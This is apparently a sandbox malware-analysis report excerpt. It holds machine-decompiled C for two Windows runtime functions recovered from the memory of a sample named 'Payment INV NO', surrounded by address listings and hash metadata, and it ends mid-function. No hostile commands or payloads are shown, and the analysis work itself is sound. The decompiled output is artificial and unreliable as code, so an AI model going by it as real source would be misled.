                                                          0x017a3ddd
                                                          0x017a3de0
                                                          0x017a3de5
                                                          0x017f8245
                                                          0x017a3deb
                                                          0x017a3df7
                                                          0x017a3dfc
                                                          0x017a3dfe
                                                          0x017a3e01
                                                          0x017a3e01
                                                          0x017a3e06
                                                          0x017f824d
                                                          0x017f824f
                                                          0x017f8254
                                                          0x00000000
                                                          0x017a3e0c
                                                          0x017a3e11
                                                          0x017a3e16
                                                          0x017a3e19
                                                          0x017a3e29
                                                          0x017a3e2c
                                                          0x017a3e2f
                                                          0x017f825c
                                                          0x017f825f
                                                          0x017f8261
                                                          0x017f8264
                                                          0x017f826c
                                                          0x017f8280
                                                          0x017f8282
                                                          0x017f8282
                                                          0x017f8289
                                                          0x017f8290
                                                          0x017f8293
                                                          0x017f8294
                                                          0x017f8298
                                                          0x017f829b
                                                          0x017f829b
                                                          0x017a3e35
                                                          0x017a3e38
                                                          0x017a3e3d
                                                          0x017a3e44
                                                          0x017a3e58
                                                          0x017f82a3
                                                          0x017f82a3
                                                          0x017a3e58
                                                          0x017a3e60
                                                          0x017a3e6f
                                                          0x017a3e74
                                                          0x017a3e77
                                                          0x017a3e77
                                                          0x017a3e7a
                                                          0x017a3e7f
                                                          0x017a3e8c
                                                          0x017a3e8c
                                                          0x017a3e91
                                                          0x00000000
                                                          0x017a3e91

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95791c1c7e7c6900ca20b76792a09dd07da268b40c975f2644a1cbf294fb96d8
                                                          • Instruction ID: 4142cf62dc9bfb456473e6dc27b2ecfaf481bbc122cfe3b60e36df6ca2bae8a7
                                                          • Opcode Fuzzy Hash: 95791c1c7e7c6900ca20b76792a09dd07da268b40c975f2644a1cbf294fb96d8
                                                          • Instruction Fuzzy Hash: 11F16C72D04619EFCB11DF98C984AEFFBB9FF48650F55016AE606A7250E7719E00CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A34B1 Relevance: .4, Instructions: 424COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017A34B1(signed int __eax, signed int __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, unsigned int _a16, unsigned int _a20, intOrPtr _a24, char _a28) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				unsigned int _v36;
				signed char _v40;
				signed char _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				unsigned int _v72;
				intOrPtr _v76;
				char _v80;
				unsigned int _v84;
				char _v88;
				signed int _t159;
				void* _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				unsigned int _t164;
				intOrPtr _t166;
				signed int _t168;
				unsigned int _t204;
				intOrPtr _t214;
				intOrPtr _t216;
				signed char _t217;
				signed int _t241;
				signed char _t242;
				signed short _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				unsigned int _t247;
				intOrPtr _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t253;
				signed int _t256;
				intOrPtr _t259;
				signed int _t261;
				signed int _t263;
				intOrPtr _t264;
				signed int _t266;
				intOrPtr _t268;
				void* _t272;
				signed int _t273;
				intOrPtr _t285;
				signed int _t293;
				signed int _t294;
				intOrPtr _t300;
				void* _t302;
				signed int _t304;
				signed int _t305;
				intOrPtr _t306;

				_v44 = __ecx;
				_t159 = __eax | 0xffffffff;
				_v88 = 0;
				_t300 = __edx;
				_v84 = 0;
				_t272 = _a4;
				_v68 = 0;
				_v60 = 0;
				_v16 = _t159;
				_v24 = _t159;
				_v20 = _t159;
				_v64 = 0;
				_v9 = 0;
				_v40 = 0;
				_v48 = 0;
				if(_t272 == 0) {
					L99:
					_t160 = 0xc000000d;
					L55:
					return _t160;
				}
				_t161 =  *_t272;
				if(_t161 == 0 || __edx == 0 ||  *((intOrPtr*)(_t161 + 4)) > 0) {
					goto L99;
				} else {
					_t247 = 0;
					_t241 = __ecx & 0x00010000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) == 0) {
						_t163 = 0;
					} else {
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfbc))));
					}
					if(_t163 == 0) {
						_t164 = _t247;
					} else {
						_t164 =  *(_t163 + 0x20);
					}
					_v72 = _t164;
					_v32 = _t272;
					if(_t241 != 0 || (_t164 & 0x00000006) == 0) {
						L12:
						_v36 = _t247;
						_t166 = E017B4620(_t247,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x154);
						_v40 = _t166;
						if(_t166 == 0) {
							_t160 = 0xc0000017;
							goto L55;
						}
						if(_t241 != 0) {
							L15:
							_t273 = 0;
							if(_a12 != 0) {
								if(_t241 != 0) {
									goto L16;
								}
								_t245 = _a12;
								_t263 = 0;
								_v56 = 0;
								if(0 >=  *(_t245 + 4)) {
									goto L16;
								}
								_t305 = 0;
								_v52 = 0;
								do {
									_t290 =  *((intOrPtr*)(_t245 + 0x10)) + _t305;
									if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x10)) + _t305))) {
										goto L82;
									}
									_t264 =  *((intOrPtr*)(_t245 + 0xc));
									_v76 = _v40;
									_v80 = 0xaa0000;
									if(_t264 == 0) {
										_t264 = _t300;
									}
									if(E017A3133(_t264, _t290,  &_v80) < 0) {
										L81:
										_t263 = _v56;
										goto L82;
									}
									_push(_t264);
									_t302 = E017A40BE(_v32, _t300, 0,  &_v16, _v76);
									if(_t302 < 0) {
										goto L50;
									}
									_t305 = _v52;
									goto L81;
									L82:
									_t263 = _t263 + 1;
									_t305 = _t305 + 6;
									_v56 = _t263;
									_v52 = _t305;
								} while (_t263 < ( *(_t245 + 4) & 0x0000ffff));
								_t273 = 0;
							}
							L16:
							_t242 = _v44;
							_t168 = _t242 & 0x00000020;
							_v52 = _t168;
							if(_t168 == 0) {
								L36:
								_v88 = 0xaa0000;
								_v84 = _v40 + 0xaa;
								_t302 = E017A49B0( &_v28, _t300);
								if(_t302 < 0) {
									goto L50;
								}
								_t303 = _v28;
								if(E017A3B30(_v28 & 0x0000ffff,  &_v88) == 0) {
									_t302 = 0xc0000001;
									goto L50;
								}
								_t249 = _t300;
								_t302 = E017A3BF4(_t249, _t303, 1,  &_v20);
								if(_t302 < 0) {
									goto L50;
								}
								_t243 = _v20;
								if((_t242 & 0x00000040) != 0) {
									L44:
									if(_v9 == 0) {
										goto L50;
									}
									_t250 = _v32;
									if(_t250 == 0) {
										goto L50;
									}
									_t251 =  *_t250;
									_t302 = E017A1F8A(_t251, _t300, _v72 >> 0x00000002 & 1, _v68, _a4);
									if(_t302 >= 0 && (_v44 & 0x00000030) == 0x30) {
										_push(_t251);
										_t302 = E017A40BE(_a4, _t300, 0,  &_v24, _v84);
										if(_t302 < 0) {
											goto L50;
										}
										_t253 = _t243 * 0x1c;
										_t278 =  *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t253;
										if(( *( *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t253) & 0x00000006) != 0) {
											if(_v36 == 0) {
												L96:
												_t195 =  *((intOrPtr*)(_t300 + 0x1c));
												L97:
												_push(_t253);
												_t302 = L01836BEC(_a4, _t278, _t300, _t195);
												goto L50;
											}
											_t195 = _v48;
											if(_v48 != 0) {
												goto L97;
											}
											goto L96;
										}
									}
									goto L50;
								}
								if(_a28 != 0) {
									if(_v60 > 0) {
										goto L44;
									}
								}
								_push(_t249);
								_t302 = E017A40BE(_v32, _t300, 0,  &_v24, _v84);
								if(_t302 >= 0 && _v52 != 0) {
									_t256 = _t243 * 0x1c;
									_t281 =  *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t256;
									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t256) & 0x00000006) != 0) {
										if(_v36 == 0) {
											L91:
											_t202 =  *((intOrPtr*)(_t300 + 0x1c));
											L92:
											_push(_t256);
											_t302 = L01836BEC(_v32, _t281, _t300, _t202);
											if(_t302 < 0) {
												goto L50;
											}
											goto L44;
										}
										_t202 = _v48;
										if(_v48 != 0) {
											goto L92;
										}
										goto L91;
									}
								}
								goto L44;
							}
							_t204 = _a16;
							if(_t204 == 0 ||  *((intOrPtr*)(_t204 + 4)) <= _t273) {
								_t204 = _a20;
								if(_t204 == 0 ||  *((intOrPtr*)(_t204 + 4)) <= _t273) {
									goto L36;
								} else {
									goto L21;
								}
							} else {
								L21:
								_v36 = _t204;
								if( *((char*)(_t204 + 8)) == 0) {
									_t244 = _a24;
									_v48 = _t244;
									if(_t244 != 0) {
										L24:
										_v56 = _t273;
										if(0 >=  *((intOrPtr*)(_t204 + 4))) {
											L35:
											_t242 = _v44;
											goto L36;
										}
										_t304 = _t273;
										while(1) {
											_t283 =  *((intOrPtr*)(_t204 + 0x10)) + _t304;
											if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x10)) + _t304))) {
												goto L34;
											}
											_t259 = _t300;
											_v76 = _v40;
											_v80 = 0xaa0000;
											if(E017A3133(_t259, _t283,  &_v80) < 0) {
												goto L34;
											}
											_push(_t259);
											if(E017A40BE(_v32, _t300, 1,  &_v16, _v76) >= 0 && (_v44 & 0x00000010) != 0) {
												_t214 =  *((intOrPtr*)(_v36 + 0x10));
												if( *((short*)(_t304 + _t214)) != 2) {
													goto L34;
												}
												_t261 =  *(_t304 + _t214 + 4) * 0x1c;
												_t216 =  *((intOrPtr*)(_t300 + 0x14));
												_t288 =  *((intOrPtr*)(_t216 + 0xc)) + _t261;
												_t217 =  *( *((intOrPtr*)(_t216 + 0xc)) + _t261) & 0x0000ffff;
												if((_t217 & 0x00000007) == 0) {
													goto L34;
												}
												if((_t217 & 0x00000006) != 0) {
													_push(_t261);
													if(L01836BEC(_v32, _t288, _t300, _t244) < 0) {
														goto L34;
													}
												}
												_v60 = _v60 + 1;
											}
											L34:
											_t304 = _t304 + 6;
											_t285 = _v56 + 1;
											_v56 = _t285;
											if(_t285 < ( *(_v36 + 4) & 0x0000ffff)) {
												_t204 = _v36;
												continue;
											}
											goto L35;
										}
									}
									_t244 =  *((intOrPtr*)(_t300 + 0x20));
									L23:
									_v48 = _t244;
									goto L24;
								}
								_t244 =  *((intOrPtr*)(_t300 + 0x1c));
								goto L23;
							}
						}
						_t306 = _a8;
						if(_t306 != 0) {
							_t266 = 0;
							_v52 = 0;
							if(0 >=  *(_t306 + 4)) {
								goto L15;
							}
							_v56 = 0;
							do {
								_t229 =  *((intOrPtr*)(_t306 + 0x10)) + _t266;
								_t293 = _v52;
								if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x10)) + _t266))) {
									goto L70;
								}
								_v76 = _v40;
								_t268 =  *((intOrPtr*)(_t306 + 0xc));
								_v80 = 0xaa0000;
								if(_t268 == 0) {
									_t268 = _t300;
								}
								if(E017A3133(_t268, _t229,  &_v80) < 0) {
									L69:
									_t293 = _v52;
									_t266 = _v56;
								} else {
									_push(_t268);
									_t302 = E017A40BE(_v32, _t300, 0,  &_v16, _v76);
									if(_t302 < 0) {
										goto L50;
									}
									_t306 = _a8;
									goto L69;
								}
								L70:
								_t294 = _t293 + 1;
								_t266 = _t266 + 6;
								_v52 = _t294;
								_v56 = _t266;
							} while (_t294 < ( *(_t306 + 4) & 0x0000ffff));
						}
						goto L15;
					} else {
						_v68 = _t164 >> 0x10;
						_v9 = 1;
						_v32 =  &_v64;
						_t302 = E017A75CE(_t300, 0x19, _t247);
						if(_t302 < 0) {
							L50:
							_t248 = _v64;
							if(_v64 != 0) {
								E017A76E2(_t248);
							}
							_t173 = _v40;
							if(_v40 != 0) {
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t173);
							}
							_t160 = _t302;
							goto L55;
						}
						_t247 = 0;
						goto L12;
					}
				}
			}





























































                                                          0x017a34bc
                                                          0x017a34c0
                                                          0x017a34c3
                                                          0x017a34c7
                                                          0x017a34c9
                                                          0x017a34cc
                                                          0x017a34cf
                                                          0x017a34d2
                                                          0x017a34d5
                                                          0x017a34d9
                                                          0x017a34dd
                                                          0x017a34e1
                                                          0x017a34e4
                                                          0x017a34e7
                                                          0x017a34ea
                                                          0x017a34ef
                                                          0x017f7f3e
                                                          0x017f7f3e
                                                          0x017a37d6
                                                          0x017a37dc
                                                          0x017a37dc
                                                          0x017a34f5
                                                          0x017a34f9
                                                          0x00000000
                                                          0x017a3511
                                                          0x017a3519
                                                          0x017a351b
                                                          0x017a3527
                                                          0x017f7d87
                                                          0x017a352d
                                                          0x017a3539
                                                          0x017a3539
                                                          0x017a353d
                                                          0x017f7d8e
                                                          0x017a3543
                                                          0x017a3543
                                                          0x017a3543
                                                          0x017a3546
                                                          0x017a3549
                                                          0x017a354e
                                                          0x017a357c
                                                          0x017a3589
                                                          0x017a358f
                                                          0x017a3594
                                                          0x017a3599
                                                          0x017f7d95
                                                          0x00000000
                                                          0x017f7d95
                                                          0x017a35a1
                                                          0x017a35ae
                                                          0x017a35ae
                                                          0x017a35b3
                                                          0x017f7e27
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7e2d
                                                          0x017f7e32
                                                          0x017f7e34
                                                          0x017f7e3b
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7e41
                                                          0x017f7e43
                                                          0x017f7e46
                                                          0x017f7e4b
                                                          0x017f7e50
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7e52
                                                          0x017f7e58
                                                          0x017f7e5b
                                                          0x017f7e64
                                                          0x017f7e66
                                                          0x017f7e66
                                                          0x017f7e73
                                                          0x017f7e96
                                                          0x017f7e96
                                                          0x00000000
                                                          0x017f7e96
                                                          0x017f7e75
                                                          0x017f7e89
                                                          0x017f7e8d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7e93
                                                          0x00000000
                                                          0x017f7e99
                                                          0x017f7e9d
                                                          0x017f7e9e
                                                          0x017f7ea1
                                                          0x017f7ea4
                                                          0x017f7ea7
                                                          0x017f7eab
                                                          0x017f7eab
                                                          0x017a35b9
                                                          0x017a35b9
                                                          0x017a35be
                                                          0x017a35c1
                                                          0x017a35c4
                                                          0x017a36a1
                                                          0x017a36a9
                                                          0x017a36b0
                                                          0x017a36bd
                                                          0x017a36c1
                                                          0x00000000
                                                          0x00000000
                                                          0x017a36c7
                                                          0x017a36da
                                                          0x017f7f34
                                                          0x00000000
                                                          0x017f7f34
                                                          0x017a36e9
                                                          0x017a36f0
                                                          0x017a36f4
                                                          0x00000000
                                                          0x00000000
                                                          0x017a36fd
                                                          0x017a3701
                                                          0x017a3745
                                                          0x017a3749
                                                          0x00000000
                                                          0x00000000
                                                          0x017a374b
                                                          0x017a3750
                                                          0x00000000
                                                          0x00000000
                                                          0x017a375d
                                                          0x017a376d
                                                          0x017a3771
                                                          0x017a377d
                                                          0x017a3792
                                                          0x017a3796
                                                          0x00000000
                                                          0x00000000
                                                          0x017a379b
                                                          0x017a37a4
                                                          0x017a37a9
                                                          0x017f7f16
                                                          0x017f7f1f
                                                          0x017f7f1f
                                                          0x017f7f22
                                                          0x017f7f22
                                                          0x017f7f2d
                                                          0x00000000
                                                          0x017f7f2d
                                                          0x017f7f18
                                                          0x017f7f1d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7f1d
                                                          0x017a37a9
                                                          0x00000000
                                                          0x017a3771
                                                          0x017a3707
                                                          0x017a37e3
                                                          0x00000000
                                                          0x00000000
                                                          0x017a37e9
                                                          0x017a370d
                                                          0x017a3722
                                                          0x017a3726
                                                          0x017a3731
                                                          0x017a373a
                                                          0x017a373f
                                                          0x017f7eec
                                                          0x017f7ef5
                                                          0x017f7ef5
                                                          0x017f7ef8
                                                          0x017f7ef8
                                                          0x017f7f03
                                                          0x017f7f07
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7f0d
                                                          0x017f7eee
                                                          0x017f7ef3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7ef3
                                                          0x017a373f
                                                          0x00000000
                                                          0x017a3726
                                                          0x017a35ca
                                                          0x017a35cf
                                                          0x017a35d7
                                                          0x017a35dc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a35ec
                                                          0x017a35ec
                                                          0x017a35f0
                                                          0x017a35f3
                                                          0x017f7eb2
                                                          0x017f7eb5
                                                          0x017f7eba
                                                          0x017a35ff
                                                          0x017a3601
                                                          0x017a3608
                                                          0x017a369e
                                                          0x017a369e
                                                          0x00000000
                                                          0x017a369e
                                                          0x017a360e
                                                          0x017a3610
                                                          0x017a3615
                                                          0x017a361a
                                                          0x00000000
                                                          0x00000000
                                                          0x017a361f
                                                          0x017a3621
                                                          0x017a3628
                                                          0x017a3636
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3638
                                                          0x017a364e
                                                          0x017a3659
                                                          0x017a3661
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3668
                                                          0x017a366b
                                                          0x017a3671
                                                          0x017a3673
                                                          0x017a3678
                                                          0x00000000
                                                          0x00000000
                                                          0x017a367c
                                                          0x017f7ed0
                                                          0x017f7edd
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7ee3
                                                          0x017a3682
                                                          0x017a3682
                                                          0x017a3685
                                                          0x017a3688
                                                          0x017a368e
                                                          0x017a368f
                                                          0x017a3698
                                                          0x017f7ec8
                                                          0x00000000
                                                          0x017f7ec8
                                                          0x00000000
                                                          0x017a3698
                                                          0x017a3610
                                                          0x017f7ec0
                                                          0x017a35fc
                                                          0x017a35fc
                                                          0x00000000
                                                          0x017a35fc
                                                          0x017a35f9
                                                          0x00000000
                                                          0x017a35f9
                                                          0x017a35cf
                                                          0x017a35a3
                                                          0x017a35a8
                                                          0x017f7d9f
                                                          0x017f7da3
                                                          0x017f7daa
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7db0
                                                          0x017f7db3
                                                          0x017f7db8
                                                          0x017f7dbd
                                                          0x017f7dc0
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7dc5
                                                          0x017f7dc8
                                                          0x017f7dcb
                                                          0x017f7dd4
                                                          0x017f7dd6
                                                          0x017f7dd6
                                                          0x017f7de5
                                                          0x017f7e08
                                                          0x017f7e08
                                                          0x017f7e0b
                                                          0x017f7de7
                                                          0x017f7de7
                                                          0x017f7dfb
                                                          0x017f7dff
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7e05
                                                          0x00000000
                                                          0x017f7e05
                                                          0x017f7e0e
                                                          0x017f7e12
                                                          0x017f7e13
                                                          0x017f7e16
                                                          0x017f7e19
                                                          0x017f7e1c
                                                          0x017f7e20
                                                          0x00000000
                                                          0x017a3554
                                                          0x017a3559
                                                          0x017a3564
                                                          0x017a3568
                                                          0x017a3570
                                                          0x017a3574
                                                          0x017a37af
                                                          0x017a37af
                                                          0x017a37b4
                                                          0x017a37b6
                                                          0x017a37b6
                                                          0x017a37bb
                                                          0x017a37c0
                                                          0x017a37cf
                                                          0x017a37cf
                                                          0x017a37d4
                                                          0x00000000
                                                          0x017a37d4
                                                          0x017a357a
                                                          0x00000000
                                                          0x017a357a
                                                          0x017a354e

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0e74c7aee9f20b7d75973f60ce5ffe197c5b29de92d5228e08e50accf95f9d0
                                                          • Instruction ID: 4c44b4fe95773444e0dadae46fbd9044033d60b2389e97ea3c77e00be6bb33f1
                                                          • Opcode Fuzzy Hash: a0e74c7aee9f20b7d75973f60ce5ffe197c5b29de92d5228e08e50accf95f9d0
                                                          • Instruction Fuzzy Hash: 32F16271E012199BDB19CFA9C884AAEFBF5BF88710F548269EA11AB345E734DC41CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C65A0 Relevance: .4, Instructions: 368COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E017C65A0(signed int __ecx, unsigned int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr* _v12;
				unsigned int _v16;
				intOrPtr _v20;
				signed int _v24;
				short _v26;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* __ebx;
				signed int _t189;
				signed int _t197;
				signed int _t202;
				signed int _t203;
				unsigned int _t205;
				signed int _t206;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				intOrPtr _t227;
				signed int _t229;
				signed int* _t240;
				signed int _t251;
				signed int _t253;
				signed int _t256;
				signed int _t259;
				signed int _t264;
				signed int _t267;
				signed int _t271;
				intOrPtr _t278;
				intOrPtr _t279;
				signed int _t280;
				signed short _t283;
				signed int _t285;
				signed int _t290;
				signed char _t294;
				signed int _t295;
				intOrPtr _t296;
				intOrPtr* _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t311;
				signed int _t319;
				void* _t323;
				unsigned int _t325;
				signed int _t330;
				signed int _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr _t336;
				intOrPtr _t337;
				signed int _t343;
				signed int _t344;
				unsigned int _t345;
				signed int _t346;
				signed int _t347;
				unsigned int _t348;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed int _t367;
				intOrPtr* _t369;
				unsigned int _t371;
				signed int _t372;
				signed int _t376;

				_t325 = __edx;
				_t278 = _a16;
				_t189 =  *(_t278 + 2) & 0x000000ff;
				_t358 = __ecx;
				_t285 =  *(__edx + 0x1b) & 0x000000ff;
				_v16 = __edx;
				_v24 = __ecx;
				_v20 =  *((intOrPtr*)(__edx + 0x10));
				if(_t285 != 0) {
					_v12 =  *((intOrPtr*)(__ecx + 0x5c4 + _t189 * 4)) + 0xffffff98 + _t285 * 0x68;
				} else {
					_v12 =  *((intOrPtr*)(__ecx + 0x3c0 + _t189 * 4));
				}
				_t195 =  *(_t278 + 3) >> 0x00000001 & 0x00000003;
				if(( *(_t278 + 3) >> 0x00000001 & 0x00000003) != 0) {
					_t279 = _a12;
					_t197 = L018556B6(_t358, _t325, _a4, _t195 & 0x000000ff, _a8, _t279, _t278);
					__eflags = _t197;
					if(_t197 == 0) {
						_t325 = _v16;
						goto L4;
					}
				} else {
					_t279 = _a12;
					L4:
					_t290 = _a8 + 8;
					_v40 = _t290;
					_v28 = _t290 >> 0x00000003 & 0x0000ffff;
					 *_a4 = _t325;
					_t202 = _t279 - 0x20;
					if(_t290 == 0x20) {
						_t203 = _t202 >> 5;
					} else {
						_t203 = _t202 / _t290;
					}
					_t280 = 0;
					_v8 = 0;
